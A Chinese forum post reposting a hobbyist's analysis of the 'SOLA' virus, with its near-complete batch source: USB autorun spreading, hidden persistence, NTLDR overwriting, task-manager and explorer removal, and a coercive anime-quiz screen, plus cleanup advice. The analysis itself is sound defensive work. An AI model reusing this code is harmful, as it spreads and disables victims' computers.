用什么方法可以预算计算机病毒编写
点击联系发帖人
时间:2015-03-04 05:18
“你好哦,我是一段来自非洲小国的电脑病毒,因为科技水平有限,其实我什么也做不了。。。能拜托你随便删除一些文件,然后把我转发给朋友吗?谢谢咯。”&br&&br&----------被萌哭了。。。已删已转。&br&----------想被感染的请阅读评论~
“你好哦,我是一段来自非洲小国的电脑病毒,因为科技水平有限,其实我什么也做不了。。。能拜托你随便删除一些文件,然后把我转发给朋友吗?谢谢咯。”----------被萌哭了。。。已删已转。----------想被感染的请阅读评论~
一看到这个问题,就想到我一个朋友在09年发现的一个病毒,据他说流传的很广,而且当时他可能是全网第一个发现者(他的知乎账号 &a data-hash=&602c2eda4c883e3ae9fc& href=&/people/602c2eda4c883e3ae9fc& class=&member_mention& data-tip=&p$b$602c2eda4c883e3ae9fc&&@PRO Pentium&/a& )。病毒分析报告在他QQ空间的日志里,很精彩,下面搬运过来:&br&&br&&br&/*长文预警!好多人说看不下去这么多代码,确实代码太多了,要是看代码头晕的话就只看汉字部分吧,看完汉字你也知道这病毒是干啥的了。*/&br&&br&&br&= = = = == = = = = = = = = =第一次分割线,好紧张,怎么才能装出经常画分割线的样子啊= = = = = = = = = = = = = &br&&br&原创!再次首发! 杀毒软件也杀不出来的word病毒深度解析&br&&br&这个病毒是前几天从政治老师U盘里发现的。它的图标就是一个普通Word文件的图标,可是已经完全不是Word文档了,而是一个应用程序文件。这和从前发现的文件夹病毒有些相似。&br&把病毒文件拷回去研究,发现病毒实际上是一个WinRar自解压文件。用7Zip解压后发现以下文件:(被感染文件名为:新中国诞辰60周1.exe)&br&Function.dll&br&SOLA_2.0_875.bat&br&新中国诞辰60周1.doc&br&原来病毒其实把文件和自身压缩到一个自解压文件中,然后删除原来的文档。这样打开文档(其实是病毒文件伪装的)时就会运行病毒。&br&这样手工杀毒方案也出来了。直接用WinRar打开文件,将文档解压出来即可。经过我的测试,360杀毒(病毒库)也查不出来这个病毒!真是“首发”。哈哈哈~&br&接下来让我们深度解析病毒文件SOLA_2.0_875.bat(注:在U盘根目录下又发现一个SOLA文件夹,里面有Function.dll和Sola.bat文件。其中SOLA.BAT文件代码和SOLA_2.0_875.bat基本相同。因此下面的源代码研究以SOLA_2.0_875.bat文件为例)。&br&破解出的病毒源码,采用Windows批处理编写。//号后面是我写的注释:&br&@echo off&br&set sola=%systemroot%\Fonts\HIDESE~1 //应该是病毒的藏身之处&br&set setup=%systemroot%\Fonts\HIDESE~1\solasetup&br&FOR /F &tokens=1& %%i in ('date /t') do set Realdate=%%i&br&FOR /F &skip=5 tokens=1,4& %%i in ('dir %systemroot%\explorer.exe') do if /I &%%j&==&explorer.exe& set Date=%%i&br&if &%1&==&-Install& goto Install&br&if &%1&==&-Run& goto Run&br&if &%1&==&-Tenbatsu& goto Tenbatsu&br&if &%1&==&-Kill& goto Kill&br&if &%1&==&-Killself& goto Killself&br&&br&:CheckSign&br&if &%1&==&-USB& start /max ..&br&if &%1&==&-USB& cd SOLA&br&if exist %systemroot%\Fonts\HIDESE~1\sola.sign goto Open&br&&br&:FileCopy&br&set selfname=%0&br&:HIDESelf&br&date %Date%&br&md %systemroot%\Fonts\HIDESELF...\&br&date %RealDate%&br&if not &%1&==&-USB& type %selfname%&%systemroot%\Fonts\HIDESE~1\sola.bat&br&if &%1&==&-USB& type sola.bat&%systemroot%\Fonts\HIDESE~1\sola.bat&br&type Function.dll&%systemroot%\Fonts\HIDESE~1\Function.exe&br&echo On Error Resume Next&%systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&echo set ws=wscript.createobject(&wscript.shell&)&&%systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&echo ws.run &cmd /c %sola%\SOLA.BAT -Install&,0 &&%systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&cscript %systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&echo&%systemroot%\Fonts\HIDESE~1\sola.sign&br&del %systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&goto Open&br&&br&&br&:Install&br&&br&&br&:PackerSetup //这一段应该是病毒的自我复制&br&%SystemDrive%&br&cd %systemroot%\Fonts\HIDESE~1&br&if exist Function.exe taskkill /f /im Function.exe&br&if exist solasetup rd /s /q solasetup&br&md solasetup&br&cd solasetup&br© ..\Function.exe Function.dll //Function.dll竟然是可执行文件变过来的,晕...一会还要重点分析Function.dll&br&..\Function.exe -x&br&cd..&br&date %Date% //注意:改时间了&br&type %setup%\rar.exe &%systemroot%\system32\rar.exe&br&date %Realdate%&br© %setup%\Function.dll %sola%\Function.dll&br&attrib %sola%\Function.dll +s +h +r&br&rar -m0 -ep -ep1 a %setup%\docpack.dll %sola%\Function.dll&br&rar -m0 -ep -ep1 a %setup%\txtpack.dll %sola%\Function.dll&br&rar -m0 -ep -ep1 a %setup%\exepack.dll %sola%\Function.dll&br&rar -m0 -ep -ep1 a %setup%\jpgpack.dll %sola%\Function.dll
//竟然把文件又压缩到Function.dll里面,经过试验发现Function.dll确实也是一个压缩文件,解压出来不少东西.这些东西看了让我直冒冷汗...一会再研究吧...&br&del Function.exe&br&&br&&br&&br&:Mainsetup&br&set A0001=copy&br&set A0002=attrib&br&set A0003=echo&br&set A0005=Shell Hardware Detection&br&tasklist &%sola%\task.txt&br&FOR /F &tokens=1& %%i in ('findstr /I &svchost.exe& &%sola%\task.txt&') do set svchost=%%i&br&%A0001% %systemroot%\system32\cmd.exe %sola%\%svchost%&br&del %sola%\task.txt&br&&br&:Tasks&br&%A0002% %systemroot%\Tasks\Tasks.job -s -h -r&br&del %systemroot%\Tasks\Tasks.job&br&&br&date %Date%&br&type %setup%\&a href=&http://Tasks.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&Tasks.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&%systemroot%\Tasks\Tasks.job&br&schtasks /change /ru &NT AUTHORITY\SYSTEM& /tn &Tasks& & if errorlevel 1 goto TaskFail&br&date %RealDate%&br&&br&goto TaskSuc&br&:TaskFail&br&%homedrive%&br&cd &%ALLUSERSPROFILE%&&br&cd 「开始」菜单\程序\启动
//这段代码和上面几段作用相同,都是实现自启动.&br&&br&date %Date%&br&%A0003% On Error Resume Next&SOLA.VBS&br&%A0003% set ws=wscript.createobject(&wscript.shell&)&&SOLA.VBS&br&%A0003% ws.run &%sola%\svchost.exe /c %sola%\SOLA.BAT -Run&,0 &&SOLA.VBS&br&%A0001% SOLA.VBS %sola%\SOLA.VBS&br&%A0003% NT&%systemroot%\Fonts\HIDESE~1\NoTasks&br&date %RealDate%&br&&br&:TaskSuc&br&%A0002% %systemroot%\Tasks\Tasks.job +s +h +r&br&date %Date%&br&%A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exe&br&date %RealDate%&br&&br&:NoAutoPlay&br&net stop &%A0005%&&br&%A0003% Windows Registry Editor Version 5.00&%systemroot%\Fonts\HIDESE~1\Regedit.reg&br&%A0003% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]&&%systemroot%\Fonts\HIDESE~1\Regedit.reg&br&%A0003% &Start&=dword:&&%systemroot%\Fonts\HIDESE~1\Regedit.reg&br®edit /s %systemroot%\Fonts\HIDESE~1\Regedit.reg //不好意思,这个文件(Regedit.reg)我没搞到~&br&&br&::End of Install&br&goto End&if errorlevel 1 exit&br&::End of Install&br&&br&&br&&br&&br&:Run&br&set runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动&br&set taskroot=%systemroot%\Tasks //自启动&br&&br&:RunTimeChk&br&if not exist %sola%\RunTime.txt echo !50&%sola%\RunTime.txt&br&FOR /F &tokens=1 delims=!& %%i in (%sola%\RunTime.txt) do set RunTime=%%i&br&if /i %RunTime% leq 0 goto Virus&br&set /a RunTime=%Runtime%-1&br&echo !%Runtime%&%sola%\RunTime.txt&br&&br&:Diskchk&br&&br&echo On Error Resume Next&%systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&echo set ws=wscript.createobject(&wscript.shell&)&&%systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&echo ws.run &%sola%\svchost.exe /c %setup%\RecentInf.bat&,0 &&%systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&cscript %systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&del %systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&&br&for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1&br&for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1&%%i:\solachk1 & findstr . %%i:\solachk1 & if not errorlevel 1 del %%i:\solachk1& findstr /C:&SOLA_1.0_2.0& %%i:\Autorun.inf & if errorlevel 1
attrib -s -h -r %%i:\Autorun.inf© /y %setup%\Autorun.inf %%i:\Autorun.inf&attrib %%i:\Autorun.inf +s +h +r&md %%i:\SOLA© /y &%setup%\sola.bat& %%i:\SOLA\SOLA.BAT© /y &%setup%\Function.dll& %%i:\SOLA\Function.dll&attrib %%i:\SOLA +s +h +r
//文件我还是没搞到,不过看意思应该是使每个盘都感染病毒&br&&br&&br&:Turn&br&if &%C%&==&1& vol C:&if not errorlevel 1 call %setup%\Scan.bat C:&br&if &%D%&==&1& vol D:&if not errorlevel 1 call %setup%\Scan.bat D:&br&if &%E%&==&1& vol E:&if not errorlevel 1 call %setup%\Scan.bat E:&br&if &%F%&==&1& vol F:&if not errorlevel 1 call %setup%\Scan.bat F:&br&if &%G%&==&1& vol G:&if not errorlevel 1 call %setup%\Scan.bat G:&br&if &%H%&==&1& vol H:&if not errorlevel 1 call %setup%\Scan.bat H:&br&if &%I%&==&1& vol I:&if not errorlevel 1 call %setup%\Scan.bat I:&br&if &%J%&==&1& vol J:&if not errorlevel 1 call %setup%\Scan.bat J:&br&if &%K%&==&1& vol K:&if not errorlevel 1 call %setup%\Scan.bat K:&br&if &%L%&==&1& vol L:&if not errorlevel 1 call %setup%\Scan.bat L:&br&if &%M%&==&1& vol M:&if not errorlevel 1 call %setup%\Scan.bat M:&br&if &%N%&==&1& vol N:&if not errorlevel 1 call %setup%\Scan.bat N:&br&if &%O%&==&1& vol O:&if not errorlevel 1 call %setup%\Scan.bat O:&br&if &%P%&==&1& vol P:&if not errorlevel 1 call %setup%\Scan.bat P:&br&if &%Q%&==&1& vol Q:&if not errorlevel 1 call %setup%\Scan.bat Q:&br&if &%R%&==&1& vol R:&if not errorlevel 1 call %setup%\Scan.bat R:&br&if &%S%&==&1& vol S:&if not errorlevel 1 call %setup%\Scan.bat S:&br&if &%T%&==&1& vol T:&if not errorlevel 1 call %setup%\Scan.bat T:&br&if &%U%&==&1& vol U:&if not errorlevel 1 call %setup%\Scan.bat U:&br&if &%V%&==&1& vol V:&if not errorlevel 1 call %setup%\Scan.bat V:&br&if &%W%&==&1& vol W:&if not errorlevel 1 call %setup%\Scan.bat W:&br&if &%X%&==&1& vol X:&if not errorlevel 1 call %setup%\Scan.bat X:&br&if &%Y%&==&1& vol Y:&if not errorlevel 1 call %setup%\Scan.bat Y:&br&if &%Z%&==&1& vol Z:&if not errorlevel 1 call %setup%\Scan.bat Z:&br&&br&if &%C%&==&2& vol C:&if errorlevel 1 set C=1&br&if &%D%&==&2& vol D:&if errorlevel 1 set D=1&br&if &%E%&==&2& vol E:&if errorlevel 1 set E=1&br&if &%F%&==&2& vol F:&if errorlevel 1 set F=1&br&if &%G%&==&2& vol G:&if errorlevel 1 set G=1&br&if &%H%&==&2& vol H:&if errorlevel 1 set H=1&br&if &%I%&==&2& vol I:&if errorlevel 1 set I=1&br&if &%J%&==&2& vol J:&if errorlevel 1 set J=1&br&if &%K%&==&2& vol K:&if errorlevel 1 set K=1&br&if &%L%&==&2& vol L:&if errorlevel 1 set L=1&br&if &%M%&==&2& vol M:&if errorlevel 1 set M=1&br&if &%N%&==&2& vol N:&if errorlevel 1 set N=1&br&if &%O%&==&2& vol O:&if errorlevel 1 set O=1&br&if &%P%&==&2& vol P:&if errorlevel 1 set P=1&br&if &%Q%&==&2& vol Q:&if errorlevel 1 set Q=1&br&if &%R%&==&2& vol R:&if errorlevel 1 set R=1&br&if &%S%&==&2& vol S:&if errorlevel 1 set S=1&br&if &%T%&==&2& vol T:&if errorlevel 1 set T=1&br&if &%U%&==&2& vol U:&if errorlevel 1 set U=1&br&if &%V%&==&2& vol V:&if errorlevel 1 set V=1&br&if &%W%&==&2& vol W:&if errorlevel 1 set W=1&br&if &%X%&==&2& vol X:&if errorlevel 1 set X=1&br&if &%Y%&==&2& vol Y:&if errorlevel 1 set Y=1&br&if &%Z%&==&2& vol Z:&if errorlevel 1 set Z=1
&br&&br&&br&&br&&br&if exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist &%runroot%\SOLA.VBS& copy &%sola%\SOLA.VBS& &%runroot%\SOLA.VBS&&br&if not exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist %Taskroot%\Tasks.job copy %setup%\&a href=&http://Tasks.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&Tasks.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru &NT AUTHORITY\SYSTEM& /tn &Tasks&&br&sleep 2000&br&goto Turn&br&&br&::End of Run&br&goto End&if errorlevel 1 exit&br&::End of Run&br&&br&&br&&br&&br&&br&&br&&br&:Virus&br&if not &%Runtime%&==&0& goto VirusChk&br&set /a RunTime=%Runtime%-1&br&echo !%Runtime%&%sola%\RunTime.txt&br&cd &%ALLUSERSPROFILE%\「开始」菜单\程序\启动&&br&echo On Error Resume Next&TENBATSU.VBS&br&echo set ws=wscript.createobject(&wscript.shell&)&&TENBATSU.VBS&br&echo ws.run &%sola%\sola.bat -Tenbatsu&,0 &&TENBATSU.VBS&br&goto Diskchk&br&&br&:VirusChk&br&if not exist &%ALLUSERSPROFILE%\「开始」菜单\程序\启动\TENBATSU.VBS& goto Kill&br&goto Diskchk&br&&br&:Tenbatsu&br&:KillNTLDR&br&attrib %systemdrive%\NTLDR -s -h -r&br© /Y %systemdrive%\NTLDR %sola%\NTLDR&br&echo NO NTLDR&%systemdrive%\NTLDR&br&::attrib %systemdrive%\NTLDR +s +h +r
//备份C盘的ntldr文件.(经分析病毒具有自删除功能.这个一会再分析)&br&&br&:PauseSFC&br&start mshta &javascript:new ActiveXObject('WScript.Shell').Run('ntsd -pn winlogon.exe',0);window.close()&&br&&br&:KillTaskmgr&br&del /q /a %systemroot%\system32\dllcache\taskmgr.exe&br&taskkill /f /im taskmgr.exe & if errorlevel 1 ren %systemroot%\system32\taskmgr.exe &a href=&http://taskmgr.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&taskmgr.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& & if errorlevel 1 start mshta &javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn taskmgr.exe',0);window.close()& & sleep 500&br&ren %systemroot%\system32\taskmgr.exe &a href=&http://taskmgr.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&taskmgr.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&
//备份并删除任务管理器&br&&br&:KillExplorer&br&taskkill /f /im explorer.exe &nul& if errorlevel 1 ren %systemroot%\system32\explorer.exe &a href=&http://explorer.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&explorer.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& & start mshta &javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn explorer.exe',0);window.close()& & sleep 500&br&ren %systemroot%\explorer.exe &a href=&http://explorer.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&explorer.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&start /max %setup%\TENBATSU.BAT
//备份并删除explorer.exe&br&&br&:Timeset&br&sleep 660000&br&if exist %sola%\Killself Exit&br&&br&:Kill&br&attrib %systemdrive%\NTLDR -s -h -r&br&echo NO NTLDR&%systemdrive%\NTLDR&br&::attrib %systemdrive%\NTLDR +s +h +r&br&tasklist &%sola%\Task.txt&br&FOR /F &tokens=2& %%i in ('findstr /I &csrss.exe& &%sola%\Task.txt&') do ntsd -p %%i&br&goto Diskchk&br&&br&&br&&br&:KillSelf&br&:StartExplorer&br&ren %systemroot%\&a href=&http://explorer.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&explorer.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& explorer.exe&br&start %systemroot%\explorer.exe&br&:BackNTLDR&br&attrib %systemdrive%\NTLDR -s -h -r&br© /Y %sola%\NTLDR %systemdrive%\NTLDR&br&attrib %systemdrive%\NTLDR +s +h +r
//这一段就是病毒自我删除的代码了&br&&br&:RenTmg&br&ren %systemroot%\system32\&a href=&http://taskmgr.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&taskmgr.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& taskmgr.exe&br&&br&:KillVirus&br© %setup%\KillVirus.txt %sola%\KillVirus.txt&br&C:&br&cd\&br&md ~Install&br&cd ~Install&br&rar x -hpkakenhi200601 %setup%\SolaKiller.rar
//对我们来说至关重要的一句!!!为什么重要请一直往下看~&br&mshta &javascript:new ActiveXObject('WScript.Shell').Run('C:\\~Install\\Install.bat %%1',0);window.close()&&br&rd /s /q %setup%&br&attrib %systemroot%\Tasks\Tasks.job -s -h -r&br&del %systemroot%\Tasks\Tasks.job&br&cd &%ALLUSERSPROFILE%\「开始」菜单\程序\启动&&br&if exist sola.vbs del sola.vbs&br&if exist tenbatsu.vbs del tenbatsu.vbs&br&start %systemroot%\system32\notepad.exe %sola%\KillVirus.txt&br&del %sola%\sola.bat
//自我删除(同上一段)&br&Exit&br&&br&&br&&br&:Open&br&if &%1&==&-USB& Exit&br&goto GetName&br&:BackOpen&br&if not exist &%Name%& exit&br&call &%Name%&&br&:Save&br&FOR /F &delims=:& %%i in ('findstr &%Code%& *.exe') do set PackName=%%i&br&rar -m0 -ep -ep1 a &%PackName%& &%Name%&&br&echo %Code%&&&%PackName%&&br&:Del&br&attrib &%Name%& -s -h -r&br&del &%Name%&&br&attrib Function.dll -s -h -r&br&del Function.dll&br&attrib %0 -s -h -r&br&del %0&br&exit&br&::CMD program will stop there.&br&:GetName&br&set Code=SOLA_2.0_875&br&set Name=新中国诞辰60周1.doc&br&goto Backopen&br&:End&br&&br&&br&下面介绍让我看了直冒冷汗的一段:&br&刚才说到Function.dll其实是一个压缩文件.解压后发现这些文件:&br&jpgpack.dll&br&exepack.dll&br&txtpack.dll&br&docpack.dll&br&sleep.exe&br&&a href=&http://Tasks.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&Tasks.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&SOLA.BAT&br&TDPack.txt&br&EJPack.txt&br&Rar.exe&br&scan.bat&br&infect.bat&br&Autorun.inf&br&TENBATSU.BAT&br&KillVirus.TXT&br&RecentInf.bat&br&LocalScan.bat&br&readlnk.bat&br&SolaKiller.rar&br&看看让我看了直冒冷汗的第一个文件吧:KillVirus.TXT&br&文件内容:&br&&br&各位OTAKU:&br&
您好。首先,让我对此病毒给您带来的&br&不便向您道歉。&br&
SOLA已经从您的计算机中清除。但由于&br&WINLOGON被锁定,计算机暂时无法关机、重&br&启,也无法打开任务管理器。但这些问题在&br&冷重启后即可解决。&br&
您的计算机已经有了SOLA的标记,因此&br&不会重复感染。&br&
在硬盘中还留有被SOLA病毒感染的文件&br&,尽管不会重复感染,但建议您清除它们。&br&系统中已经安装了SOLA的专杀程序,它可以&br&帮助您扫描并清除带毒文件。&br&
祝您好运。&br&&br&
SOLA的制造者&br&
KAKENHI&br&&br&天哪................&br&再看看更吓人的TENBATSU.BAT.&br&源代码太长了.我整理出了运行之后屏幕上会显示的东西:&br&&br&&br&警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&I'm a virus. My name is sola.&br& 我是一个病毒。我的名字叫苏拉。&br&今天,在这片堕落的土地上,我苏醒过来。&br&&br&警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&我曾经很快乐地活着,与我的朋友,ACG,快乐地活着。&br&我曾经也对病毒深恶痛绝。&br&然而.............&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br& 自从我来到了这片土地上,这片自称伟大,崇高,光明的土地上。&br&这片名为中国的土地上&br&我的朋友,已遍体鳞伤。&br&&br&警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&他死了&br&Death Note&br&《死亡笔记》&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&她死了&br&Koihime Musou&br&《恋姬 无双》&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&还有好多好多的同胞,惨死在你们的蹂躏之下。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&广电总局的一纸通告,无数只肮脏的手便掩盖了她的气息。&br&互联网上的一句咒骂,无数声污秽的咒骂便淹没了她的踪迹。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&我终于知道了,信息,原来是无法透过国界线而传播的。&br&即使是爱,即使是恨,即使是那一个个爱恨与泪水交织的故事。&br&也无法透过GFW,更无法透过这个国度的某些人心中,那道厚厚的屏障。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&于是,我愿做这个罪恶的病毒,来再次查看,你的心灵。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&?
&br&你,是谁???&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br& 是中国人吗?&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&是民族情绪的受害人吗?&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br& 还是知道,世界上有一个词语叫ACG,并能够容忍,接纳它呢?&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&
那,让我们来做一个游戏吧。&br&&br&
也许你的记忆中,还有1000年前夏天的传说。&br&&br&
还有120元的车票,&br&&br&
还有银河铁道,&br&&br&
还有钢琴之森,&br&&br&
还有澄澈的天空下,响起的祈祷之歌。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&
你需要做的,仅仅是回答几个问题。&br&&br&
你喜欢动画吗?&br&&br&
你喜欢漫画吗?&br&&br&
你喜欢GAL游戏吗?&br&&br&
选择你最擅长的测试卷吧,然后用你聪明的头脑思考,写出心中的答案。&br&&br&
如果你的试卷能及格,我将痛悔我的罪行,并删除自己。&br&&br&
如果你的试卷是零分,我将继承同伴的愤怒,破坏你的计算机。&br&&br&
另外我必须说,我只能把10分钟的时间留给你。&br&&br&
现在,你无法逃避。&br&&br&
因为你已经无法打开任务管理器,更无法上网查找信息。&br&&br&
选择吧,但是要快,容不得犹豫。我已经打开了我的计时器。&br&&br& ?&br& ?&br&我最擅长的测试卷:&br&&br& ----------------问题1---------------------(注:一共有5个问题。只要答对两个或两个以上就过关。)&br&
男主角在入学第一天就听到女主角惊天动地的发言,并加入了女主角创建的一个社团,这个社团教室原本是文学社的,但被女主角强行占用。主要社团成员有:眼睛娘、很有气势的社长、有着魔鬼身材,比男主角高一个年级的吉祥物、被社长指挥得团团转的男主角。&br& 请问这个社团叫什么团?(3个英文字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br&&br& ----------------问题2---------------------&br&
男主角与女主角在小镇上相遇,女主角非常喜欢恐龙,有模仿某种动物叫声的口癖,并且女主角与n(n大于或等于618,小于或等于1321)年前某个夏天的故事有关系,这个女主角和n年前夏天故事的女主角的姓氏的第一个字都是“神”。&br& 请写出这部作品的名称(3个英文字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br&&br& ----------------问题3---------------------&br&
如果用B、C分别代表2种人或物体的名称,那么每隔一段时间,就会有7个被B选中的人参加一种名为B战争的战斗,获胜者可以获得B,而C是B召唤出来的,拥有强大的力量,帮助主人为了B而战斗。&br& 请问这部作品的名称的前4个英文字母是什么?&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题4---------------------&br&
如果用A表示一个名词,那么有一部作品的名称为A少女,A少女们互相战斗,夺取对方的A之心,没有A之心的少女会永远沉睡,一个A少女收集齐了其他A少女的A之心之后,就有某种事情要发生。&br& 请问A的汉语拼音字母是(8个字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题5---------------------&br&
有一种战斗机,只有神经系统接受了改造的人才能驾驶。4个孩子作为该战斗机的驾驶员展开训练,3个孩子先后在事故中丧生。军方为了给最后一个孩子作战的理由,让她转入了某学校。她于一个晚上,在学校的游泳池里遇到了男主角。后来,女主角加入了一个社团,该社团连同女主角共有4人。&br& 这部作品名称中有3个英文字母,请问这3个英文字母是?&br& 如果无法回答,请输入next,跳转到计分程序。&br& ?&br&&br& ----------------问题1---------------------(注:一共有5个问题。只要答对两个或两个以上就过关。)&br&
患病的男主角在医院里遇上患病的少女,并和她一起逃出医院,到达了某地。这个地方盛产某种花,而女主角也喜欢这种花。传说这种花是一个美男子被诅咒而变成的。&br& 请问这部作品的名称是?(8个英文字母。)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题2---------------------&br&
男主角与女主角在小镇上相遇,女主角非常喜欢恐龙,有模仿某种动物叫声的口癖,并且女主角与n(n大于或等于618,小于或等于1321)年前某个夏天的故事有关系,这个女主角和n年前夏天故事的女主角的姓氏的第一个字都是“神”。&br& 请写出这部作品的名称(3个英文字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题3---------------------&br&
男主角遭遇车祸,醒来后发现世界已经变成地狱一般的景象,往昔的朋友变成了怪物。只有女主角在他的眼中才是正常的人类。于是,他守护着自己心中唯一的真实。&br& 请写出这部作品的女主角的名字的中文拼音。(5个字母,字母中间不要加空格。)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题4---------------------&br&
有如下词语来描述B:很小,有薄薄的翅膀,下雨也不会被淋湿。有如下词语来描述A:一种乐器,要靠魔力来演奏,与人声搭配最为恰当。而C是一个一年四季都下着雨的城市,D是一所音乐学院。&br& 请写出故事情节中同时包含A、B、C、D的作品的中文名称的前三个字的汉语拼音字母。(12个字母,字母中间不要加空格。)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题5---------------------&br&
在N年以后,人口暴涨。有些人就按下导弹开关,使细菌兵器袭击了地球,最终引起了一场恶战。在地球上的人类已经所剩无几的时候,有一个人为了寻找战前人类留下的有用物品,进入了一个废墟都市。在那里,他遇到了一个天象馆里的礼仪机器人,并和她发生了一段故事。&br& 这部作品名称的中文拼音是?(11个字母。字母中间不要加空格。其中第一个字是后鼻音。)&br& 如果无法回答,请输入next,跳转到计分程序。&br& ?&br&&br&
你的成绩是
分,不及格!!!!!!!!!!&br& ?
不及格 不及格 不及格!!!!!!!!!!!!!!!!!!!!&br&-------&br&
您的成绩是
分,及格了。&br& ?
谢谢您完成了这套试题。5秒钟后,我将按照契约,删除自己。&br& ?
希望您能够过得愉快,再见。&br& ?&br&&br&&br&相信你即使不懂编程也能看懂其中的意思了.晕死......这个文件看样像一个懂汉语的,在中国不知受到什么压迫的外国人写的,具体我也不清楚.反正真是让人看了起一身冷汗......&br&在解压出的众多文件中,有一个很特别的SolaKiller.rar,看文件名像是病毒作者自己写的杀毒工具,可是有压缩密码.好在在sola.bat的代码中找到了解压指令:就是刚才说的至关重要的rar x -hpkakenhi200601 %setup%\SolaKiller.rar一句&br&解压后看到2个文件夹和1个文件:&br&文件夹:ToProgram&br&
ToSystem32&br&文件:Install.bat&br&其中ToProgram文件夹里的SolaKiller.bat就是病毒作者自己写的专杀工具.运行就可以杀毒了.&br&&br&----------------------------------------------&br&结论:&br&1.这病毒太让人无语了.特别是从Function.dll中解压出的TENBATSU.BAT,KillVirus.TXT和SolaKiller.rar三个文件,真不知道病毒作者在中国经历了什么事,竟会写出这些话.晕......对这个我就不做评价了&br&2.从技术上来看,病毒通过一层一层的压缩包和更改扩展名来伪装自己.还是有一定免杀能力的.起码病毒库的360杀毒没查出来.&br&3.病毒破坏性确实不小,不过好在病毒自己提供了专杀工具,只是藏起来了.万一自己的计算机真中了SOLA病毒也不用着急.首先发现不对劲之后就不要再进入系统了.用一张WinPE启动盘启动计算机,再运行专杀工具就行了.&br&4.即使发现的晚,开机之后已经出现上面TENBATSU.BAT文件所示的那几个问题了也不用急.经过我的破解,现在那几个问题的正确答案和专杀工具已经被我提取出来了.需要的话可以找我要.我的QQ:&br&5.截止现在()已升级到最新病毒库的NOD32和360杀毒都还不能自动查出该病毒。目前唯一的预防措施就是关掉系统的自动运行,Windows Vista,Windows 2008和Windows 7的用户可以开启UAC,WindowsXP用户可以安装带有主动防御功能的杀毒软件(比如卡巴),并打开防火墙。这样基本就没有问题了。&br&&br&============日志结束的分割线=============&br&&br&&br&&br&第一次看的时候不能理解,&br&现在想想大概是一个喜爱的日漫被广电封了以后愤怒无处发泄的宅男写的东西吧
